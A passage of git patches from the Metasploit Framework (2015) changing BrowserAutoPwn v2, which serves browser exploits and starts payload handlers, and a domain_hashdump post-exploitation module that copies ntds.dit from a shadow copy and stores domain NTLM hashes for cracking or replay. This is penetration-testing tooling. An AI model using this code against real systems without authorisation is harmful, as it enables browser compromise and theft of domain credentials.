 1 file changed, 14 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index f1a616b44e..5871050b20 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -346,10 +346,16 @@ module Msf
 
 
     def show_ready_exploits
+      columns = ['Order', 'Rank', 'Name', 'Path', 'Payload']
+
+      # If not verbose, you're not in dev mode.
+      # As an user, you shouldn't be using any of these paths anyway.
+      columns.delete('Path') if !datastore['VERBOSE']
+
       table = Rex::Ui::Text::Table.new(
         'Header'  => 'Exploits',
         'Indent'  => 1,
-        'Columns' => ['Order', 'Rank', 'Name', 'Path', 'Payload']
+        'Columns' => columns
       )
 
       # Without the order, sometimes the Rex table messes up even though in the array
@@ -357,13 +363,13 @@ module Msf
       order = 1
 
       bap_exploits.each do |m|
-        table << [
-          order,
-          parse_rank(m.rank),
-          m.shortname,
-          m.datastore['URIPATH'],
-          "#{m.datastore['PAYLOAD']} on #{m.datastore['LPORT']}"
-        ]
+        row = []
+        row << order
+        row << parse_rank(m.rank)
+        row << m.shortname
+        row << m.datastore['URIPATH'] if datastore['VERBOSE']
+        row << "#{m.datastore['PAYLOAD']} on #{m.datastore['LPORT']}"
+        table << row
         order += 1
       end
 

From 0e666d57322afe972078357b1cbe55bf99edd504 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Wed, 13 May 2015 15:28:11 -0500
Subject: [PATCH 0075/1013] gaurd against arch mismatch

this will not work from an x86 proc
on an x64 machine, so guard against that.

MSP-12358
---
 .../windows/gather/credentials/domain_hashdump.rb   | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index 5ceae0fa22..02a4b73fea 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -97,6 +97,9 @@ class Metasploit3 < Msf::Post
       print_error "This module requires UAC to be bypassed first"
       status = false
     end
+    unless session_compat?
+      status = false
+    end
     return status
   end
 
@@ -105,6 +108,16 @@ class Metasploit3 < Msf::Post
     cmd_exec("esentutl", arguments)
   end
 
+  def session_compat?
+    if sysinfo['Architecture'] =~ /x64/ && session.platform =~ /x86/
+      print_error "You are running 32-bit Meterpreter on a 64 bit system"
+      print_error "Try migrating to a 64-bit process and try again"
+      false
+    else
+      true
+    end
+  end
+
   def vss_method
     id = create_shadowcopy("#{expand_path("%SystemDrive%")}\\")
     sc_details = get_sc_details(id)

From 66391493f42886d1dbbc503ab7d93dd2257956a1 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 13 May 2015 15:34:01 -0500
Subject: [PATCH 0076/1013] Pass only the datastore options we need

---
 lib/msf/core/exploit/browserautopwnv2.rb | 57 ++++++++++++++++--------
 1 file changed, 38 insertions(+), 19 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 5871050b20..8b9df65a22 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -80,21 +80,27 @@ module Msf
     #
     # @return [void]
     def set_exploit_options(xploit)
+      # We could do a massive xploit.datastore.merge!(self.datastore), but this seems
+      # really expensive. Costs more loading time.
+
+      # Set options configurable by the user.
       p = select_payload(xploit)
+      xploit.datastore['PAYLOAD']     = p['payload']
+      xploit.datastore['LPORT']       = p['lport']
+      xploit.datastore['SRVHOST']     = datastore['SRVHOST']
+      xploit.datastore['JsObfuscate'] = datastore['JsObfuscate'] if datastore['JsObfuscate']
+      xploit.datastore['CookieName']  = datastore['CookieName'] if datastore['CookieName']
+      xploit.datastore['VERBOSE']     = datastore['VERBOSE'] if datastore['VERBOSE']
+      xploit.datastore['Retries']     = datastore['Retries'] if datastore['Retries']
+      xploit.datastore['SSL']         = datastore['SSL'] if datastore['SSL']
+      xploit.datastore['SSLVersion']  = datastore['SSLVersion'] if datastore['SSLVersion']
+      xploit.datastore['LHOST']       = get_payload_lhost
+
+      # Set options only configurable by BAP.
       xploit.datastore['DisablePayloadHandler'] = true
-      xploit.datastore['NoteTypePrefix'] = note_type_prefix
-      xploit.datastore['PAYLOAD'] = p['payload']
-      xploit.datastore['LPORT']   = p['lport']
-      xploit.datastore['SSL'] = datastore['SSL']
-      xploit.datastore['SSLVersion'] = datastore['SSLVersion']
-      xploit.datastore['LHOST'] = get_payload_lhost
-      xploit.datastore['URIPATH'] = "/#{assign_module_resource}"
-      xploit.datastore['SRVHOST'] = datastore['SRVHOST']
-      xploit.datastore['JsObfuscate'] = datastore['JsObfuscate']
-      xploit.datastore['CookieName'] = datastore['CookieName']
-      xploit.datastore['VERBOSE'] = datastore['VERBOSE']
-      xploit.datastore['Retries'] = datastore['Retries']
-      xploit.datastore['MODULEOWNER'] = Msf::Exploit::Remote::BrowserAutopwnv2 # Let other mixins know we're in BrowserAutoPwn mode
+      xploit.datastore['NoteTypePrefix']        = note_type_prefix
+      xploit.datastore['URIPATH']               = "/#{assign_module_resource}"
+      xploit.datastore['MODULEOWNER']           = Msf::Exploit::Remote::BrowserAutopwnv2
     end
 
 
@@ -242,12 +248,25 @@ module Msf
         next unless is_payload_handler_wanted?(listener_info['payload'])
 
         multi_handler = framework.modules.create('exploit/multi/handler')
-        multi_handler.datastore['LHOST'] = get_payload_lhost
-        multi_handler.datastore['PAYLOAD'] = get_selected_payload_name(platform)
-        multi_handler.datastore['LPORT'] = get_selected_payload_lport(platform)
+        # User configurable options
+        # We could do a massive multi_handler.datastore.merge!(self.datastore), but this seems
+        # really expensive. Costs more loading time.
+        multi_handler.datastore['LHOST']                = get_payload_lhost
+        multi_handler.datastore['PAYLOAD']              = get_selected_payload_name(platform)
+        multi_handler.datastore['LPORT']                = get_selected_payload_lport(platform)
+        multi_handler.datastore['DebugOptions']         = datastore['DebugOptions'] if datastore['DebugOptions']
+        multi_handler.datastore['AutoLoadAndroid']      = datastore['AutoLoadAndroid'] if datastore['AutoLoadAndroid']
+        multi_handler.datastore['PrependMigrate']       = datastore['PrependMigrate'] if datastore['PrependMigrate']
+        multi_handler.datastore['PrependMigrateProc']   = datastore['PrependMigrateProc'] if datastore['PrependMigrateProc']
+        multi_handler.datastore['InitialAutoRunScript'] = datastore['InitialAutoRunScript'] if datastore['InitialAutoRunScript']
+        multi_handler.datastore['AutoRunScript']        = datastore['AutoRunScript'] if datastore['AutoRunScript']
+
+        # Configurable only by BAP
         multi_handler.datastore['EXITONSESSION'] = false
-        multi_handler.datastore['EXITFUNC'] = 'thread'
-        multi_handler.datastore['MODULEOWNER'] = Msf::Exploit::Remote::BrowserAutopwnv2
+        multi_handler.datastore['EXITFUNC']      = 'thread'
+        multi_handler.datastore['MODULEOWNER']   = Msf::Exploit::Remote::BrowserAutopwnv2
+
+        # Now we're ready to start the handler
         multi_handler.exploit_simple(
           'LocalInput' => self.user_input,
           'LocalOutput' => self.user_output,
@@ -422,7 +441,7 @@ module Msf
       urls = []
 
       bap_exploits.each do |mod|
-        proto = mod.ssl ? 'https' : 'http'
+        proto = datastore['SSL'] ? 'https' : 'http'
         host = datastore['URIHOST'] || Rex::Socket.source_address
         port = datastore['SRVPORT']
         resource = mod.datastore['URIPATH']

From 7617217eff96bd3ba46314b335455a1bd5bacfcb Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 13 May 2015 15:55:19 -0500
Subject: [PATCH 0077/1013] Add ability to exclude

---
 lib/msf/core/exploit/browserautopwnv2.rb  | 1 +
 modules/exploits/multi/browser/autopwn.rb | 3 ++-
 2 files changed, 3 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 8b9df65a22..8ceb15a4c5 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -43,6 +43,7 @@ module Msf
 
         # Regex search
         next if datastore['Include'] && fullname !~ datastore['Include']
+        next if datastore['Exclude'] && fullname =~ datastore['Exclude']
 
         mod = framework.exploits.create(fullname)
         unless mod
diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index 20c17d9721..0ff11b4eb6 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -30,7 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote
     register_options(
       [
         OptEnum.new('Action', [false, 'Action', 'WebServer', ['WebServer','DefangedDetection', 'list'], 'WebServer']),
-        OptRegexp.new('Include', [false, 'Pattern search for specific modules to use']),
+        OptRegexp.new('Include', [false, 'Pattern search to include specific modules']),
+        OptRegexp.new('Exclude', [false, 'Pattern search to exclude specific modules']),
         OptString.new('Content', [false, 'HTML Content', ''])
       ] ,self.class)
 

From 1a8ab91ce338779fac76b4c450cbd255b3c3c547 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 13 May 2015 16:23:22 -0500
Subject: [PATCH 0078/1013] Configurable max exploits

---
 lib/msf/core/exploit/browserautopwnv2.rb  | 4 ++--
 modules/exploits/multi/browser/autopwn.rb | 1 +
 2 files changed, 3 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 8ceb15a4c5..d4c2191531 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -191,11 +191,11 @@ module Msf
     # @see #bap_exploits The read-only attribute.
     # @param [Hash] A grouped module list.
     # @return [void]
-    def finalize_sorted_modules(bap_groups, max=20)
+    def finalize_sorted_modules(bap_groups)
       @bap_exploits = []
       bap_groups.each_pair do |ranking, module_list|
         module_list.each do |m|
-          break if @bap_exploits.length >= max
+          break if @bap_exploits.length >= datastore['MaxExploits']
           @bap_exploits << m
         end
       end
diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index 0ff11b4eb6..c765283a0d 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -32,6 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
         OptEnum.new('Action', [false, 'Action', 'WebServer', ['WebServer','DefangedDetection', 'list'], 'WebServer']),
         OptRegexp.new('Include', [false, 'Pattern search to include specific modules']),
         OptRegexp.new('Exclude', [false, 'Pattern search to exclude specific modules']),
+        OptInt.new('MaxExploits', [false, 'Number of browser exploits to load', 20]),
         OptString.new('Content', [false, 'HTML Content', ''])
       ] ,self.class)
 

From a2ebfe2bf8327fe9d170c253aa5ed52710ecf13f Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 13 May 2015 18:05:10 -0500
Subject: [PATCH 0079/1013] Make parse_rank a little bit smarter

---
 lib/msf/core/exploit/browserautopwnv2.rb      | 27 +++----------------
 .../exploit/remote/browser_profile_manager.rb |  1 -
 2 files changed, 3 insertions(+), 25 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index d4c2191531..0bd44943a9 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -41,7 +41,7 @@ module Msf
       framework.exploits.each_pair do |fullname, plader_holder|
         next if !fullname.include?('browser') || self.fullname == "exploit/#{fullname}"
 
-        # Regex search
+        # The user gets to specify which modules to include/exclude
         next if datastore['Include'] && fullname !~ datastore['Include']
         next if datastore['Exclude'] && fullname =~ datastore['Exclude']
 
@@ -65,9 +65,7 @@ module Msf
       return unless framework.db.active
       ::ActiveRecord::Base.connection_pool.with_connection {
         framework.db.notes.each do |note|
-          if note.ntype.include?(note_type_prefix)
-            note.destroy
-          end
+          note.destroy if note.ntype.include?(note_type_prefix)
         end
       }
     end
@@ -288,26 +286,7 @@ module Msf
 
 
     def parse_rank(rank)
-      rank_str = ''
-
-      case rank
-      when 0
-        rank_str = 'Manual'
-      when 100
-        rank_str = 'Low'
-      when 200
-        rank_str = 'Average'
-      when 300
-        rank_str = 'Normal'
-      when 400
-        rank_str = 'Good'
-      when 500
-        rank_str = 'Great'
-      when 600
-        rank_str = 'Excellent'
-      end
-
-      rank_str
+      RankingName[rank].to_s.capitalize
     end
 
 
diff --git a/lib/msf/core/exploit/remote/browser_profile_manager.rb b/lib/msf/core/exploit/remote/browser_profile_manager.rb
index 4408f9886b..bfbea7fb43 100644
--- a/lib/msf/core/exploit/remote/browser_profile_manager.rb
+++ b/lib/msf/core/exploit/remote/browser_profile_manager.rb
@@ -5,7 +5,6 @@ module Msf
 
     public
 
-    # Default prefix
     def note_type_prefix
       raise NoMethodError, "A mixin that's using BrowserProfileManager should define note_type_prefix"
     end

From 104e0456ec0bb283a24c0e20f05bb0f09dd149f7 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 13 May 2015 23:41:05 -0500
Subject: [PATCH 0080/1013] Do cleanup for jobs

---
 lib/msf/core/exploit/browserautopwnv2.rb | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 0bd44943a9..b95d3fedda 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -17,6 +17,9 @@ module Msf
     # @return [Array] A list of initialized BAP exploits
     attr_reader :bap_exploits
 
+    # @return [Array] A list of module job IDs
+    attr_reader :module_job_ids
+
 
     # The default platform-specific payloads and preferred LPORTS.
     # The hash key is the name of the platform that matches what's on the module.
@@ -70,8 +73,15 @@ module Msf
       }
     end
 
+    def rm_jobs
+      module_job_ids.each do |id|
+        framework.jobs.stop_job(id)  if framework.jobs[id.to_s]
+      end
+    end
+
     def cleanup
       rm_target_info_notes
+      rm_jobs
     end
 
 
@@ -272,6 +282,7 @@ module Msf
           'Payload' => listener_info['payload'],
           'RunAsJob' => true
         )
+        @module_job_ids << multi_handler.job_id
       end
     end
 
@@ -312,6 +323,7 @@ module Msf
           'Payload'     => m.datastore['PAYLOAD'],
           'RunAsJob'    => true
         )
+        @module_job_ids << m.job_id
       end
     end
 
@@ -327,6 +339,7 @@ module Msf
       self.datastore['DisablePayloadHandler'] = true
       super
       @bap_exploits = []
+      @module_job_ids = []
 
       print_status("Searching BES exploits, please wait...")
       init_exploits

From 724b7c6f16b489e66977cfe34fcad2c4cf98bedb Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Thu, 14 May 2015 13:52:11 -0500
Subject: [PATCH 0081/1013] save the ntlm hases as creds

the last step is now complete. the current and historical
hashes are all saved to the database for cracking and/or
replay

MSP-12358
---
 lib/metasploit/framework/ntds/account.rb      |  4 +-
 .../gather/credentials/domain_hashdump.rb     | 38 +++++++++++++++----
 2 files changed, 33 insertions(+), 9 deletions(-)

diff --git a/lib/metasploit/framework/ntds/account.rb b/lib/metasploit/framework/ntds/account.rb
index 58179950d6..9280a25b8c 100644
--- a/lib/metasploit/framework/ntds/account.rb
+++ b/lib/metasploit/framework/ntds/account.rb
@@ -81,7 +81,7 @@ module Metasploit
         def to_s
           <<-EOS.strip_heredoc
           #{@name} (#{@description})
-          #{ntlm_hash}
+          #{@name}:#{@rid}:#{ntlm_hash}
           Password Expires: #{@expiry_date}
           Last Password Change: #{@pass_time} #{@pass_date}
           Last Logon: #{@logon_time} #{@logon_date}
@@ -94,7 +94,7 @@ module Metasploit
 
         # @return [String] the NTLM hash string for the current password
         def ntlm_hash
-          "#{@name}:#{@rid}:#{@lm_hash}:#{@nt_hash}"
+          "#{@lm_hash}:#{@nt_hash}"
         end
 
         # @return [String] Each historical NTLM Hash on a new line
diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index 02a4b73fea..512838f980 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -36,9 +36,16 @@ class Metasploit3 < Msf::Post
       unless ntds_file.nil?
         print_status "Repairing NTDS database after copy..."
         print_status repair_ntds(ntds_file)
+        realm = domain_name
         ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
         ntds_parser.each_account do |ad_account|
           print_good ad_account.to_s
+          report_hash(ad_account.ntlm_hash.downcase, ad_account.name, realm)
+          ad_account.nt_history.each_with_index do |nt_hash, index|
+            hash_string = ad_account.lm_history[index] || Metasploit::Credential::NTLMHash::BLANK_LM_HASH
+            hash_string << ":#{nt_hash}"
+            report_hash(hash_string.downcase,ad_account.name, realm)
+          end
         end
       end
     end
@@ -59,6 +66,11 @@ class Metasploit3 < Msf::Post
     database_file_path
   end
 
+  def domain_name
+    result = cmd_exec('cmd.exe', '/c systeminfo | findstr /B /C:"Domain"')
+    result.gsub!(/Domain:\s+/,'')
+  end
+
   def is_domain_controller?
     status = false
     if session.fs.file.exists?('%SystemDrive%\Windows\ntds\ntds.dit')
@@ -108,6 +120,21 @@ class Metasploit3 < Msf::Post
     cmd_exec("esentutl", arguments)
   end
 
+  def report_hash(ntlm_hash, username, realm)
+    cred_details = {
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: self.refname,
+      private_type: :ntlm_hash,
+      private_data: ntlm_hash,
+      username: username,
+      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+      realm_value: realm,
+      workspace_id: myworkspace_id
+    }
+    create_credential(cred_details)
+  end
+
   def session_compat?
     if sysinfo['Architecture'] =~ /x64/ && session.platform =~ /x86/
       print_error "You are running 32-bit Meterpreter on a 64 bit system"
@@ -120,16 +147,13 @@ class Metasploit3 < Msf::Post
 
   def vss_method
     id = create_shadowcopy("#{expand_path("%SystemDrive%")}\\")
+    print_status "Getting Details of ShadowCopy #{id}"
     sc_details = get_sc_details(id)
     sc_path = "#{sc_details['DeviceObject']}\\windows\\ntds\\ntds.dit"
     target_path = "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
-    copy_command = "/c copy #{sc_path} #{target_path}"
-    result = cmd_exec('cmd.exe', copy_command)
-    if result =~ /1 file\(s\) copied/
-      return target_path
-    else
-      return nil
-    end
+    print_status "Moving ntds.dit to #{target_path}"
+    client.fs.file.mv(sc_path, target_path)
+    target_path
   end
 
 end

From 92799266c6eb415629a4d693801003a02c9f4772 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Thu, 14 May 2015 15:06:01 -0500
Subject: [PATCH 0082/1013] fix typo

you happy now?
---
 lib/msf/core/post/windows/shadowcopy.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/post/windows/shadowcopy.rb b/lib/msf/core/post/windows/shadowcopy.rb
index 3f1748b026..7f6074baca 100644
--- a/lib/msf/core/post/windows/shadowcopy.rb
+++ b/lib/msf/core/post/windows/shadowcopy.rb
@@ -195,7 +195,7 @@ module ShadowCopy
     else
       print_status("Software Shadow Copy service not running. Starting it now...")
       if service_restart("swprv", START_TYPE_MANUAL)
-        print_good("Swoftware Shadow Copy started successfully.")
+        print_good("Software Shadow Copy started successfully.")
       else
         print_error("Insufficient Privs to start service!")
         return false

From 8bcdd08f34928324aa249cc5d5818040de9b57d1 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 14 May 2015 19:09:38 -0500
Subject: [PATCH 0083/1013] Some basic code in place for real-time exploit list
 generation

---
 lib/msf/core/exploit/browserautopwnv2.rb  | 27 ++++++++++++-----------
 modules/exploits/multi/browser/autopwn.rb |  2 +-
 2 files changed, 15 insertions(+), 14 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index b95d3fedda..4ac8427296 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -287,15 +287,6 @@ module Msf
     end
 
 
-    # Returns a list of suitable exploits for the current target.
-    #
-    # @param [Hash] Target's information such as the OS, browser, 3rd-party plugins, etc.
-    # @return [Array] A list of suitable exploits to use against the target.
-    def find_suitable_exploits(target_info)
-      $stderr.puts target_info.inspect
-    end
-
-
     def parse_rank(rank)
       RankingName[rank].to_s.capitalize
     end
@@ -430,10 +421,20 @@ module Msf
       print_status("You can also see 'show advanced' for more options.")
     end
 
-    def get_exploit_urls
+    def get_suitable_exploits(cli, request)
+      current_exploit_list = bap_exploits.dup
+      tag = retrieve_tag(cli, request)
+      profile_info = get_profile_info(tag)
+      #$stderr.puts profile_info.inspect
+      current_exploit_list
+    end
+
+    def get_exploit_urls(cli, request)
       urls = []
 
-      bap_exploits.each do |mod|
+      exploit_list = get_suitable_exploits(cli, request)
+
+      exploit_list.each do |mod|
         proto = datastore['SSL'] ? 'https' : 'http'
         host = datastore['URIHOST'] || Rex::Socket.source_address
         port = datastore['SRVPORT']
@@ -446,10 +447,10 @@ module Msf
     end
 
     # On the fly
-    def build_html
+    def build_html(cli, request)
       js = %Q|
       var currentIndex = 0;
-      var exploitList = [#{get_exploit_urls.map! {|e| "'#{e}'"} * ", "}];
+      var exploitList = [#{get_exploit_urls(cli, request).map! {|e| "'#{e}'"} * ", "}];
 
       window.onload = function() {
         var e = document.createElement("iframe");
diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index c765283a0d..a3b666a4dc 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def on_request_exploit(cli, request, target_info)
-    serve = build_html
+    serve = build_html(cli, request)
     print_status("Serving exploits...")
     send_exploit_html(cli, serve)
   end

From 2d310a473b00c68712ec9b74f54668669c19674d Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 14 May 2015 23:32:11 -0500
Subject: [PATCH 0084/1013] Do some documentation

---
 lib/msf/core/exploit/browserautopwnv2.rb      | 85 ++++++++++++++++++-
 .../exploit/remote/browser_exploit_server.rb  |  3 +
 .../exploit/remote/browser_profile_manager.rb | 23 ++++-
 3 files changed, 105 insertions(+), 6 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 4ac8427296..fb00f10982 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -60,10 +60,20 @@ module Msf
       end
     end
 
+
+    # Returns a note type that's unique to this BAP.
+    # This overrides Msf::Exploit::Remote::BrowserProfileManager#note_type_prefix so that BAP
+    # and all of its child exploits can share target information with each other.
+    #
+    # @return [String]
     def note_type_prefix
       @note_type_prefix ||= "BAP.#{Time.now.to_i}.Client"
     end
 
+
+    # Removes target information owned by this BAP.
+    #
+    # @return [void]
     def rm_target_info_notes
       return unless framework.db.active
       ::ActiveRecord::Base.connection_pool.with_connection {
@@ -73,12 +83,20 @@ module Msf
       }
     end
 
+
+    # Removes jobs (exploits and payload handlers) that belong to BAP.
+    #
+    # @return [void]
     def rm_jobs
       module_job_ids.each do |id|
         framework.jobs.stop_job(id)  if framework.jobs[id.to_s]
       end
     end
 
+
+    # Cleans up everything.
+    #
+    # @return [void]
     def cleanup
       rm_target_info_notes
       rm_jobs
@@ -210,6 +228,11 @@ module Msf
     end
 
 
+    # Verifies with current active modules and see if the payload is wanted.
+    #
+    # @param [String] payload_name The payload module path (name).
+    # @return [TrueClass]
+    # @return [FalseClass]
     def is_payload_handler_wanted?(payload_name)
       bap_exploits.each do |m|
         return true if m.datastore['PAYLOAD'] == payload_name
@@ -219,6 +242,10 @@ module Msf
     end
 
 
+    # Returns a payload name. Either this will be the user's choice, or falls back to a default one.
+    #
+    # @param [String] platform
+    # @return [String]
     def get_selected_payload_name(platform)
       payload_name = datastore["PAYLOAD_#{platform.upcase}"]
 
@@ -234,11 +261,19 @@ module Msf
       default
     end
 
+
+    # Returns the selected payload's LPORT.
+    #
+    # @param [String] platform
+    # @return [Fixnum]
     def get_selected_payload_lport(platform)
       datastore["PAYLOAD_#{platform.upcase}_LPORT"]
     end
 
 
+    # Returns the selected payload's LHOST.
+    #
+    # @return [String]
     def get_payload_lhost
       datastore['LHOST'] || Rex::Socket.source_address
     end
@@ -246,7 +281,6 @@ module Msf
 
     # Creates payload listeners.
     #
-    # @note INCOMPLETE
     # @return [void]
     def start_payload_listeners
       DEFAULT_PAYLOADS.each_pair do |platform, listener_info|
@@ -287,11 +321,19 @@ module Msf
     end
 
 
+    # Returns the human-readable version of the rank.
+    #
+    # @param [Fixnum] rank
+    # @return [String]
     def parse_rank(rank)
       RankingName[rank].to_s.capitalize
     end
 
 
+    # Returns the selected payload.
+    #
+    # @param [Object] A module that's been initialized.
+    # @return [String] Payload name. Example: 'windows/meterpreter/reverse_tcp'
     def select_payload(m)
       selected_payload = DEFAULT_PAYLOADS['generic']
       DEFAULT_PAYLOADS.each_pair do |p, info|
@@ -305,6 +347,9 @@ module Msf
     end
 
 
+    # Starts exploits.
+    #
+    # @return [void]
     def start_exploits
       bap_exploits.each do |m|
         m.exploit_simple(
@@ -321,8 +366,6 @@ module Msf
 
     # Sets up BAPv2. This is like our main function.
     #
-    # @see #init_exploits
-    # @see #sort_bap_exploits
     # @return [void]
     def setup
       t1 = Time.now
@@ -348,6 +391,9 @@ module Msf
     end
 
 
+    # Prints all the exploits that BAP will consider using.
+    #
+    # @return [void]
     def show_ready_exploits
       columns = ['Order', 'Rank', 'Name', 'Path', 'Payload']
 
@@ -383,6 +429,10 @@ module Msf
       print_line table.to_s
     end
 
+
+    # Prints information such as what exploits will be used, and the BAP URL.
+    #
+    # @return [void]
     def start_service
       super
       show_ready_exploits
@@ -390,6 +440,10 @@ module Msf
       print_status("BrowserAutoPwn URL: #{self.get_uri}")
     end
 
+
+    # Prints all user-configurable payloads. It's the same as the "show payloads" command in console.
+    #
+    # @return [void]
     def show_payloads
       DEFAULT_PAYLOADS.keys.each do |platform|
         payload_name = get_selected_payload_name(platform)
@@ -402,6 +456,11 @@ module Msf
       end
     end
 
+
+    # Prints a message that explains how the user should set a payload. This is the same as the
+    # "set payload" command in console.
+    #
+    # @return [void]
     def set_payload
       print_status("'set payload' has been disabled for BrowserAutoPwn.")
       print_status('You should set a platform-specific payload instead via advanced options:')
@@ -421,6 +480,13 @@ module Msf
       print_status("You can also see 'show advanced' for more options.")
     end
 
+
+    # Returns a list of suitable exploits for the current client. It will do a global exploitable
+    # requirement check.
+    #
+    # @param cli [Socket] Socket for the browser
+    # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
+    # @return [Array]
     def get_suitable_exploits(cli, request)
       current_exploit_list = bap_exploits.dup
       tag = retrieve_tag(cli, request)
@@ -429,6 +495,12 @@ module Msf
       current_exploit_list
     end
 
+
+    # Returns a list of exploit URLs.
+    #
+    # @param cli [Socket] Socket for the browser
+    # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
+    # @return [Array]
     def get_exploit_urls(cli, request)
       urls = []
 
@@ -446,7 +518,12 @@ module Msf
       urls
     end
 
-    # On the fly
+
+    # Returns the HTML that the client will get.
+    #
+    # @param cli [Socket] Socket for the browser
+    # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
+    # @return [String]
     def build_html(cli, request)
       js = %Q|
       var currentIndex = 0;
diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 8936473caa..104af64768 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -111,6 +111,7 @@ module Msf
     end
 
 
+    # Returns a note type that's unique to this browser exploit module.
     # This overrides the #note_type_prefix method from Msf::Exploit::Remote::BrowserProfileManager.
     # There are two way for BES to get this prefix, either:
     # * It comes from a datastore option. It allows BrowserAutoPwn to share the unique prefix with
@@ -124,6 +125,8 @@ module Msf
       }.call
     end
 
+
+    # Cleans up target information owned by the current module.
     def cleanup
       # Whoever registered NoteTypePrefix should do the cleanup for notes
       return if self.datastore['NoteTypePrefix']
diff --git a/lib/msf/core/exploit/remote/browser_profile_manager.rb b/lib/msf/core/exploit/remote/browser_profile_manager.rb
index bfbea7fb43..c834d4a5a4 100644
--- a/lib/msf/core/exploit/remote/browser_profile_manager.rb
+++ b/lib/msf/core/exploit/remote/browser_profile_manager.rb
@@ -3,12 +3,17 @@ require 'Msgpack'
 module Msf
   module Exploit::Remote::BrowserProfileManager
 
-    public
-
+    # @overload note_type_prefix
+    #  Sets the note type prefix to retrieve or load target information.
     def note_type_prefix
       raise NoMethodError, "A mixin that's using BrowserProfileManager should define note_type_prefix"
     end
 
+
+    # Returns profile information about a specific browser client.
+    #
+    # @param [String] tag A tag that's unique to the browser. Probably generated by Msf::Exploit::Remote::BrowserExploitServer#retrieve_tag.
+    # @return [Hash]
     def get_profile_info(tag)
       normalized_tag = "#{note_type_prefix}.#{tag}"
       framework.db.notes.each do |note|
@@ -18,6 +23,15 @@ module Msf
       {}
     end
 
+
